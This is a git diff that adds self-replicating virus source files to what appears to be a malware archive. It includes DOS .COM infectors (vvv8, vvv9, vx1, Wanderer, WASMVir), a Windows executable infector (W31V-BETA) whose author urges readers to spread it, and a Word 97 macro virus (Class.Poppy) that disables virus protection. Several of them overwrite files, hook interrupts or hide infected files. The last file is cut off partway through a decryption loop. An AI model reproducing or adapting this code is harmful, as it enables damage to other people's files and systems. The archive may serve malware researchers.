MOVSB ; move v + + mov al,3 ; inf. only 3 file + mov count,al + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + mov ax,'OC' ; "CO" + sub ax,ds:[009eh] + je fin ; if file name CO*.com then skip + + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + ja fin + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. then skip this file + + mov al,'M' + mov di,dx + mov cx,ds:[0fch] + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + + dec count + jz done + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv8.asm b/MSDOS/Virus.MSDOS.Unknown.vvv8.asm new file mode 100644 index 00000000..7eccf081 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv8.asm @@ -0,0 +1,183 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID +count db 90h ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + mov al,3 ; inf. only 3 file + mov count,al + + mov ah,2ah + int 21h + mov ds:[0f2h],dx ; + mov ds:[0f4h],cx ; save system date + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + mov ax,'OC' ; "CO" + sub ax,ds:[009eh] + jne cont0 ; if file name CO*.com then skip + jmp fin + +cont0: + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + jna cont2 + jmp fin + +cont2: + mov cx,ds:[98h] + and cx,001fh + mov dl,cl + mov ax,ds:[98h] + and ax,01e0h + mov cl,5 + sar ax,cl + mov dh,al + mov ax,ds:[98h] + and ax,0fe00h + mov cl,9 + sar ax,cl + mov cx,ax + add cx,1980 + mov ah,2bh + int 21h ; set system time + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. then skip this file + + mov al,'M' + mov di,dx + mov cx,ds:[0fch] + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + + dec count + jz done + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + mov dx,ds:[0f2h] + mov cx,ds:[0f4h] + mov ah,2bh + int 21h + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv9.asm b/MSDOS/Virus.MSDOS.Unknown.vvv9.asm new file mode 100644 index 00000000..4b00899e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv9.asm @@ -0,0 +1,189 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID +count db 90h ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + mov al,3 ; inf. only 3 file + mov count,al + + mov ah,2ah + int 21h + mov ds:[0f2h],dx ; + mov ds:[0f4h],cx ; save system date + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + mov ax,'OC' ; "CO" + sub ax,ds:[009eh] + jne cont0 ; if file name CO*.com then skip + jmp fin + +cont0: + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + jna cont2 + jmp fin + +cont2: + mov cx,ds:[98h] + and cx,001fh + mov dl,cl + mov ax,ds:[98h] + and ax,01e0h + mov cl,5 + sar ax,cl + mov dh,al + mov ax,ds:[98h] + and ax,0fe00h + mov cl,9 + sar ax,cl + mov cx,ax + add cx,1980 + mov ah,2bh + int 21h ; set system time + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + cmp ax,9090h + je fin ; if file inf. then skip this file + cmp ax,'ZM' + je fin ; if file .COM is EXE then skip + + mov di,dx + mov cx,ds:[0fch] +NEWS: + or cx,cx + js cont + mov al,'M' + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + jmp news + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + + dec count + jz done + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + mov dx,ds:[0f2h] + mov cx,ds:[0f4h] + mov ah,2bh + int 21h + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.vx1.asm b/MSDOS/Virus.MSDOS.Unknown.vx1.asm new file mode 100644 index 00000000..e94c6025 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vx1.asm @@ -0,0 +1,118 @@ +Code Segment + Assume CS:Code,DS:Code,ES:Code + + V_Length Equ Program - Main + F_Name Equ 0FC1Eh + F_Time Equ 0FC16h + F_Date Equ 0FC18h + HAdr Equ 0FD00h + DTA Equ 0FC00h + + Org 100h + +Main: + push [BOP] ;bewaar orginele offset programma + + mov ah,1ah ;DTA boven neerzetten + mov dx,DTA ;DTA adres + int 21h + + mov ah,4eh ;zoek naar COM files + mov dx,Offset Target + xor cx,cx + int 21h + +Read_file: + mov ax,3d02h ;open het doelbestand + mov dx,Offset F_Name + int 21h + + mov bx,ax ;bewaar de file handle + + mov bp,cs:[F_Time] ;Bewaar de tijd + mov di,cs:[F_Date] ;Bewaar de datum + + mov ah,3fh ;lees deel van het doelbestand + mov dx,Hadr ;buffer adres + mov cx,V_Length ;lengte van het 4us + int 21h ;naar het hoog adres in + + mov si,dx ;Is het bestand al geinfecteerd? + cmp Word Ptr [si],36ffh + jne Infect_File ;Nee, infecteer het + + mov ah,4fh ;Zoek volgende COM bestand + int 21h + + jc End_Infect + jmp Short Read_File + +Infect_File: + mov ax,4202h ;zoek naar het einde van doelbestand + xor cx,cx ;ax bevat na het na het uitvoeren van + xor dx,dx ;de interrupt de lengte van de file + int 21h + + add ax,100h ;tel 100h bytes PSP erbij op en + mov BOP,ax ;bewaar de lengte van het doelbestand + + mov ah,40h ;overschrijf begin van doelbestand + mov cx,V_Length ;lengte van het 4us + mov dx,HAdr ;buffer + int 21h + + mov ax,4200h ;zoek het begin van het doelbestand op + xor cx,cx + xor dx,dx + int 21h + + mov ah,40h ;schrijf de 4uscode over de file + mov cx,V_Length ;lengte van het 4us + mov dx,Offset Main + int 21h + + mov ax,5701h ;zet orginele datum terug + mov dx,di ;datum + mov cx,bp ;tijd + int 21h + +End_Infect: + mov ah,3eh ;sluit het doelbestand af + int 21h + + mov ah,1ah ;set DTA terug naar default + mov dx,0080h + int 21h + + cld ;voorwaarts + mov di,HAdr ;buffer + push di ;en nog een voor het verplaatsen straks + mov si,Offset MoveBlock ;wijst naar relocator + mov cx,Program - MoveBlock ;lengte relocator + rep movsb ;verplaats het block + ret ;en ga er naar toe + +BOP dw Offset Program + +MoveBlock: + mov cx,V_Length ;aantal bytes dat verplaatst wordt + pop si ;haal BOP terug via de stack + mov di,0100h ;hier gaat het allemaal naar toe + push di ;bewaar voor de RET + rep movsb ;verplaatsen + ret ;en start orginele programma op + +Target: + db '*.com',0 + +Program: ;Dit is het fake programma wat later + mov ah,4ch ;door de relocator verplaatst wordt + int 21h ;naar het begin van de file + +Code Ends +End Main + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.w31v.asm b/MSDOS/Virus.MSDOS.Unknown.w31v.asm new file mode 100644 index 00000000..16e11501 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.w31v.asm @@ -0,0 +1,330 @@ +;Virus Name: W31V-BETA +;Type : Windows Virus, infects windows executables +;Written by: Stalker X +; +; +;Here it is folks my first windows virus. +;I would firstly just want to say thankyou to qark and quantum for this +;virus is based on the infection of a windows virus as discribed in VLAD-#4 +;Ok as you can see parts of this virus is based on WinSurfer, BUT as you +;can also see it's more compact. Instead of using dropper code I used a +;software fuse. This virus also does not go TSR in windows, it infects on +;execute. The reason why I did not make it TSR is because it's to mutch work +;for me :) and secondly well at the rate Windows users restart programs there +;is no need to go TSR! +;This is my first try so bare with me :) ooooh yes all that comments is +;not ment for you the reader ... BUT ME!! :) Frankly I get lost in my own +;code if I don't comment it. +;Ok Assemble this virus as a EXE then run it in the dir of a Win EXE +;This virus only infects one file at a time but it does change dir's to +;find a file. Nothing new exept that it's for windows .. if you don't +;understand what I have written ,,,, then get VLAD-#4 +; +;Please do copy this code .. add your own stuff if you want to .. I didn't +;write this so it can sit on a shelf. SO GO WILD.. just don't say you wrote +;the whole thing yourself.... just spread it as far as you can and in +;many diffrent copies as you can. + + jumps +.model tiny +.stack 512 +.code +.286P + assume cs:@code,ds:@code + org 0 + +START: pusha ;save all general regs + push si ;save si + push di ;save di + push ds ;save ds + push es ;save es + +FUSE: jmp Fused ;first time no DPMI + jmp DPMIdetect ;goto dpmi code +Fused: mov ax,cs ;ax=cs + mov ds,ax ;ds=ax + mov word ptr cs:[FUSE],9090h;blow fuse after 1st run + jmp DPMIFin ;skip dpmi code +DPMIdetect: mov ax,1686h ;check for dpmi + int 2fh ;do check + or ax,ax ;check return + jz DPMIfound ;if 0 then dpmi + jmp EXIT ;exit if no dpmi +DPMIfound: mov ax,000ah ;get alias selector + push cs ;save cs + pop bx ;restore cs in bx + int 31h ;do get alias + push ax ;save ax + pop ds ;restore ax ds +DPMIFin: mov ah,1ah ;set DTA + mov dx,offset DTA ;set DTA ofs + int 21h ;do set DTA + +FindFirst: xor cx,cx ;set f attrib + mov ah,4eh ;find first file + mov dx,offset FSPEC ;set fspec + int 21h ;do find it + jc EXIT ;exit if no exe found + +Check: call Chk4WinEXE ;check if it's a win exe + cmp [TMP],0 ;check return byte + jz FindNext ;go to next exe if not win + + call Infect ;infect the win EXE + mov ah,3eh ;close the exe file + int 21h ;do it + jmp EXIT ;exit to infect only 1 file +FindNext: mov ah,4fh ;find next file + int 21h ;do find it + jnc Check ;go check again for win +ChangeDIR: mov dx,offset DOTDOT ;'..' + mov ah,3bh ;change dir + int 21h ;do change now + jnc FindFirst ;find first file in dir + +EXIT: pop es ;restore es + pop ds ;restore ds + pop di ;restore di + pop si ;restore si + popa ;restore all general regs + db 0eah ;far Jmp +ret_ip: dw 0 ;exit program +ret_set dw 0ffffh ;- + +Chk4WinEXE: mov dx,offset F_Name ;set file name ofs + mov ax,3d02h ;open file for r/w + int 21h ;do open file + jc ChkExit ;exit on error + mov bx,ax ;save handle in bx + + mov si,offset BUFF ;si=offset of buffer + mov ah,3fh ;read function + mov dx,offset BUFF ;dx=offset of buffer + mov cx,512 ;read 512 bytes + int 21h ;do read bytes + + cmp byte ptr [si+18h],40h ;check relocation + jb ChkFinF ;exit if not ok + cmp word ptr [si+3ch],400h ;check NE offset + jne ChkFinF ;exit if not ok + cmp word ptr [si+16h],0 ;CS must be 0 + jne ChkFinF ;exit if not ok + cmp word ptr [si+14h],0 ;IP must be 0 + jne ChkFinF ;exit if not ok + cmp word ptr [si+08h],20h ;check header size + je ChkFin ;exit if not ok + +ChkFinF: mov ah,3eh ;close file + int 21h ;do close file + mov [TMP],0 ;return error + retn ;retn +ChkFin: mov [TMP],1 ;return ok +ChkExit: retn ;do it + + +Infect: mov si,offset BUFF ;si=offset buffer + sub word ptr [si+10h],8 ;move SP back 8 bytes + sub word ptr [si+3ch],8 ;move NE back 8 bytes + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + xor dx,dx ;dx=0 + int 21h ;do move r/w pointer + + mov ah,40h ;write to file + mov dx,offset BUFF ;set source offset + mov cx,3eh ;write EXE header back + int 21h ;do write header back + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,200h ;set to dest + int 21h ;do move r/w pointer + mov ah,40h ;write to file + mov dx,offset winstart ;dx=source offset + mov cx,offset windowsmsgend-offset winstart + int 21h ;write new dos stub + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,400h ;set offset + int 21h ;do move r/w pointer + mov ah,3fh ;read from file + mov dx,offset BUFF ;dx=offset of buffer + mov cx,512 ;read header + int 21h ;do read from file + + inc word ptr [si+1ch] ;inc segment count + mov ax,word ptr [si+1ch] ;ax=segment count + dec ax ;ax=ax-1 + mov cl,8 ;Assume Segs<255 + mul cl ;multiply to get bytes + xor dx,dx ;dx=0 + add ax,word ptr [si+22h] ;ax=total tab size + adc dx,0 ;add with carry(just incase) + mov cx,512 ;dx:ax/512 + div cx ;do it + mov [Move512],ax ;Number of 512pages to mov + mov [MoveLft],dx ;Number of leftover bytes + + push word ptr [si+32h] ;save file alignment value + pop [Al_Sh] ;save alignment shift value + mov [Seek],400h ;setup seek var + + push word ptr [si+16h] ;save host cs + pop [hostcs] ;save NE cs + push word ptr [si+14h] ;save host ip + pop [hostip] ;save NE ip + mov ax,word ptr [si+1ch] ;ax=number of segments + mov word ptr [si+08h],0 ;clr crc + mov word ptr [si+0ah],0 ;clr crc + mov word ptr [si+14h],0 ;set new ip + mov word ptr [si+16h],ax ;set new cs + + mov ax,word ptr [si+22h] ; + cmp word ptr [si+04h],ax ; + jb CmpRes ; + add word ptr [si+04h],8 ; +CmpRes: cmp word ptr [si+24h],ax ; + jb CmpResi ; + add word ptr [si+24h],8 ; +CmpResi: cmp word ptr [si+26h],ax ; + jb CmpModule ; + add word ptr [si+26h],8 ; +CmpModule: cmp word ptr [si+28h],ax ; + jb CmpImp ; + add word ptr [si+28h],8 ; +CmpImp: cmp word ptr [si+2ah],ax ; + jb MoveHead ; + add word ptr [si+2ah],8 ; + +MoveHead: mov ax,[Move512] ;loop to move NE head + or ax,ax ;check if counter=0 + jz Last ;exit if counter=0 + + dec [Move512] ;counter=counter-1 + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,[Seek] ;dx=seek + sub dx,8 ;dx=dx-8 + int 21h ;do move r/w pointer + + mov ah,40h ;write to file + mov dx,offset BUFF ;dx=source offset + mov cx,512 ;write 512 bytes + int 21h ;do write 512 bytes + + add [Seek],512 ;seek=seek+512 + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,[Seek] ;dx=seek + int 21h ;do move r/w pointer + + mov ah,3fh ;read file + mov dx,offset BUFF ;dx=offset buffer + mov cx,512 ;read 512 bytes + int 21h ;do read 512 bytes + + jmp MoveHead ;continue to move header + +Last: mov ax,4202h ;seek end of file + xor cx,cx ;cx=0 + xor dx,dx ;dx=0 + int 21h ;do seek + mov cl,byte ptr [Al_Sh] ;cl=shift count + push bx ;save bx + mov bx,1 ;bx=1 + shl bx,cl ;calc shift + mov cx,bx ;cx=bx + pop bx ;restore bx + div cx ;divide with shift + + mov di,offset BUFF ;di=buffer offset + add di,[MoveLft] ;calc where to patch + + mov word ptr [di],ax ;patch insert segment tab + mov word ptr [di+2],offset ALL_VIR + mov word ptr [di+4],180h + mov word ptr [di+6],offset ALL_VIR + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,[Seek] ;dx=seek + sub dx,8 ;dx=dx-8 + int 21h ;do move r/w pointer + + mov ah,40h ;write to file + mov dx,offset BUFF ;dx=source offset + mov cx,[MoveLft] ;write bytes left + add cx,8 ;cx=cx+8 (+segment entry) + int 21h ;do write to file + + mov ax,4202h ;seek end of file + xor cx,cx ;cx=0 + xor dx,dx ;dx=0 + int 21h ;do seek + + mov ax,word ptr ds:[ret_ip] ;save link + mov word ptr [si],ax ;save link + mov ax,[ret_set] ;save link + mov word ptr [si+2],ax ;save link + + mov word ptr ds:[ret_ip],0 ;setup relocation + mov [ret_set],0FFFFh ;! + mov [relocation],1 ;! + mov [reloc2],3 ;! + mov [reloc3],4 ;! + mov [reloc4],offset ret_ip ;! + + mov ah,40h ;write to file + xor dx,dx ;dx=0 + mov cx,offset ALL_CODE ;write the hole body + int 21h ;do write + + mov ax,word ptr [si] ;restore link + mov word ptr ds:[ret_ip],ax ;restore link + mov ax,word ptr [si+2] ;restore link + mov [ret_set],ax ;restore link + + retn ;return from infection + +;-Fake win msg +winstart: call windowsmsg + db 'This program requires Microsoft ' + db 'Windows.',0dh,0ah,'$' +windowsmsg: pop dx + push cs + pop ds + mov ah,9 + int 21h + mov ax,4c01h + int 21h +windowsmsgend: + +TMP dw 0 +Move512 dw 0 +MoveLft dw 0 +Al_Sh dw 0 +Seek dw 0 +DOTDOT db '..',0 +FSPEC db '*.exe',0 +DTA db 21 dup(0) +Attrib db 0 +F_Time dw 0 +F_Date dw 0 +F_SizeL dw 0 +F_SizeH dw 0 +F_Name db 13 dup(0) +IDB db 'w31v-BETA' +BUFF db 512 dup(0) +ALL_VIR: +relocation dw 1 +reloc2 db 3 +reloc3 db 4 +reloc4 dw offset ret_ip +hostcs dw 0 +hostip dw 0 +ALL_CODE: +end START diff --git a/MSDOS/Virus.MSDOS.Unknown.w97_class_poppy.txt b/MSDOS/Virus.MSDOS.Unknown.w97_class_poppy.txt new file mode 100644 index 00000000..55303c3f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.w97_class_poppy.txt @@ -0,0 +1,128 @@ +'W97/Class.Poppy.B +'Word 97 Class Object Infector +'First Ever Class Object Infetor + +Sub AutoOpen() + + ' AutoOpen Sub In Document + +On Error GoTo out + + ' Handle Errors + +Options.VirusProtection = False + + ' Turn Off Virus Protection + +Options.SaveNormalPrompt = False + + ' Turn Off Normal.dot Save Prompt + +Options.ConfirmConversions = False + + ' Turn Off Conversion Prompt (from 95 -> 97) + +ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines + + ' Count The Number Of Code Lines In The Document + +nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines + + ' Count The Number Of Code Lines In The Normal.dot + +If nt > 70 And ad > 0 Then GoTo out + + ' If We Are Installed In Both (Lines > 0 and 72) Then Exit + +If nt < 70 Then + + ' If We Are Not In The Normal.dot (Lines < 72) Then Install Us + + Set infect = NormalTemplate.VBProject.VBComponents.Item(1) + + ' Set Normal.dot Class Section As Infect Object (What We Want To Infect) + + ActiveDocument.VBProject.VBComponents.Item(1).Name = infect.Name + + ' Swamp The Class Section Names (Active Doc <- Normal Template) + + ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys" + + ' Export Our Virus Code + +End If + +If ad = 0 Then Set infect = ActiveDocument.VBProject.VBComponents.Item(1) + + ' If We Are Not In The Active Doc (Lines < 0) Then Install Us + +If Day(Now) = 14 And (Month(Now) > 5) Then MsgBox "I Think " & Application.UserName & " is a big stupid jerk!", 0, "VicodinES Loves You / Class.Poppy" + + ' If The Day And Time Are Right Insult The User + +infect.codemodule.AddFromFile ("c:\class.sys") + + ' Use The Infect Object - Import Your Virus Code + +With infect.codemodule + + ' With The Newly Infected Class Object + + For x = 1 To 4 + + ' Clean Up The First 4 Lines Of Header-Code + + .deletelines 1 + + ' Delete Line 1 - 4 Times + + Next x + +End With + +If nt < 70 Then + + ' If We Just Infected The Normal.Dot + + With infect.codemodule + + .replaceline 1, "Sub AutoClose()" + + ' Change AutoOpen (on line 1) to AutoClose + + .replaceline 71, "Sub ToolsMacro()" + + ' Change Sub ViewVBCode (on line 71) to ToolsMacro + + End With + +End If + +With infect.codemodule + + ' With The Newly Infected Object + + For x = 2 To 72 Step 2 + + ' Use Word Object Data As Polymorpic Code On Every Other Line + + .replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow + + Next x + +End With + +out: + +If nt > 70 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName + + ' If We Just Infected A Document Save It On Close + +End Sub + +Sub ViewVBCode() + + ' Stealth Hook + +End Sub + diff --git a/MSDOS/Virus.MSDOS.Unknown.wanderer.asm b/MSDOS/Virus.MSDOS.Unknown.wanderer.asm new file mode 100644 index 00000000..d81eb7a6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wanderer.asm @@ -0,0 +1,195 @@ +virus segment public 'code' + assume cs:virus,ds:virus,es:virus + org 0 + +VirusSize equ VirusEnd-$ + +Com: call Begin + call Label2 + +SavedCode: + mov ax,4c00h + int 21h + + org SavedCode+5h + +Label2: pop si + mov di,100h + push di + movsw + movsw + movsb + ret + +Begin: push ds + push es + push ax + xor ax,ax + mov ds,ax + mov ds,ds:[46ah] + cmp Signature,0ACDCh + je Exit + mov ah,4ah + mov bx,-1 + int 21h + sub bx,VirusParas1 + jb Exit + add bh,10h + mov ah,4ah + int 21h + mov ah,48h + mov bx,VirusParas2 + int 21h + jb Exit + dec ax + mov es,ax + inc ax + mov es:[1],ax + mov es,ax + push cs + pop ds + call Label1 +Label1: pop si + sub si,offset Label1 + xor di,di + push di + mov cx,VirusSize + rep movsb + pop ds + mov ax,ds:[84h] + mov word ptr es:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr es:OldInt21[2],ax + mov byte ptr ds:[467h],0eah + mov word ptr ds:[468h],offset NewInt21 + mov ds:[46ah],es + mov word ptr ds:[84h],7 + mov word ptr ds:[86h],46h +Exit: pop ax + pop ds + pop es + ret + +Header db 0e9h + dw 0 +Signature dw 0ACDCh + +NewInt21: + cmp ah,4bh + jne on1 + jmp exec +on1: cmp ah,4eh + je find + cmp ah,4fh + je find + jmp EOI + + Db ' As wolfs among sheep we have wandered ' + +Find: call interrupt ; call orginal interrupt + jc Ret1 ; error ? + pushf ; save registers + push ax + push bx + push es + mov ah,2fh + call interrupt + mov al,es:[bx+16h] ; get file-time (low byte) + and al,1fh ; seconds + cmp al,1fh ; 62 seconds ? + jne FileOk ; no, file not infected + sub word ptr es:[bx+1ah],VirusSize ; change file-size + sbb word ptr es:[bx+1ch],0 +Time: xor byte ptr es:[bx+16h],10h ; adjust file-time +FileOk: pop es ; restore registers + pop bx + pop ax + popf +ret1: retf 2 + +Exec: push ax + push bx + push cx + push dx + push ds + mov ax,3d02h + call Interrupt + jc short Error + push cs + pop ds + mov bx,ax + mov ah,3fh + mov cx,5h + mov dx,offset SavedCode + call DOS + cmp word ptr cs:SavedCode,'ZM' + je short TheEnd +ComFile:cmp word ptr cs:SavedCode[3],0ACDCh + je short TheEnd + mov al,02h + call Seek + or dx,dx + cmp ah,0f6h + je short Close + sub ax,5 + inc ax + inc ax + mov word ptr ds:Header[1],ax + mov ax,5700h + call dos + push cx + push dx + mov ah,40h + mov cx,VirusSize + xor dx,dx + call DOS + mov al,00h + call Seek + mov ah,40h + mov cx,5 + mov dx,offset Header + call dos +Close: mov ax,5701h + pop dx + pop cx + or cl,1fh + call dos +TheEnd: mov ah,3eh + call Interrupt +Error: pop ds + pop dx + pop cx + pop bx + pop ax + +EOI: db 0eah ; jmp 0:0 +OldInt21 dd 026b1465h + +Seek: mov ah,42h + xor cx,cx + xor dx,dx + +DOS: call Interrupt + jnc Ok + pop ax + jmp Close + +Interrupt: + pushf + call cs:OldInt21 +Ok: ret + +VirusEnd equ $ + +VirusParas1 equ (VirusSize+1fh)/10h+1000h +VirusParas2 equ (VirusSize+0fh)/10h + +virus ends + +end + + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.wasmvir.asm b/MSDOS/Virus.MSDOS.Unknown.wasmvir.asm new file mode 100644 index 00000000..b4aa3a53 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wasmvir.asm @@ -0,0 +1,54 @@ +;WASMVir --> A lame overwriting virus to demonstrate WASM +;Overwrites all files in the current directory +;By Lord Natas + + org 100h + +Start + mov ah,4eh + mov cx,7 + mov dx,offset FileSpec +Virus + +;----- find file + + int 21h + jc EndV + +;----- open file + + mov ax,3d01h + mov dx,9eh + int 21h + jc Close + + xchg bx,ax + +;----- write file + + mov ah,40h + mov cl,Length + mov dx,offset Start + int 21h + +Close + +;----- close file + + mov ah,3eh + int 21h + + mov ah,4fh + jmps Virus + +EndV + db 00C3h ;"RET" + +;----- data + + db 'WASMVir' + +FileSpec db '*.COM',0 + +TheEnd +Length equ offset TheEnd - offset Start diff --git a/MSDOS/Virus.MSDOS.Unknown.web_390.asm b/MSDOS/Virus.MSDOS.Unknown.web_390.asm new file mode 100644 index 00000000..0110b105 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.web_390.asm @@ -0,0 +1,225 @@ +Model Tiny +.code +.286 +org 100h +start: + push cs + push offset Entry + retf + db 'DrWeb - !' +BEG_LEN equ $-start +Entry: + pusha + push ds + push es + call En1 +EN_LEN equ $-Entry +En1: + push ds + pop es + xchg ax,di + pop bp + sub bp,EN_LEN + mov bx,1100h + mov ah,4ah + int 21h + jnc ALLOCATED +Exit_Proc: + pop es + pop ds + popa + push cs + push si + retf +ALLOCATED: + mov ax,LBL + add ax,bp + mov cl,4 + shr ax,cl + inc ax + push ds + pop bx + add ax,bx + push ax + push cs + pop ds + pop es +LBL10: + mov si, bp + cld + xor cx,cx + add si, Crypt_Start +LBL0: + mov ax,word ptr ds:[si] + inc cx + mov bx,word ptr ds:[si+2] + inc cx + xchg ah,al + inc cx + xchg bh,bl + inc cx + xchg ax,bx + xor ax,0BEBEh + xor bx,0BEBEh + mov word ptr ds:[si],ax + mov word ptr ds:[si+2],bx + add si,4 + cmp cx, Crypt_LEN + jge LBL1 + jmp short LBL0 +LBL1: 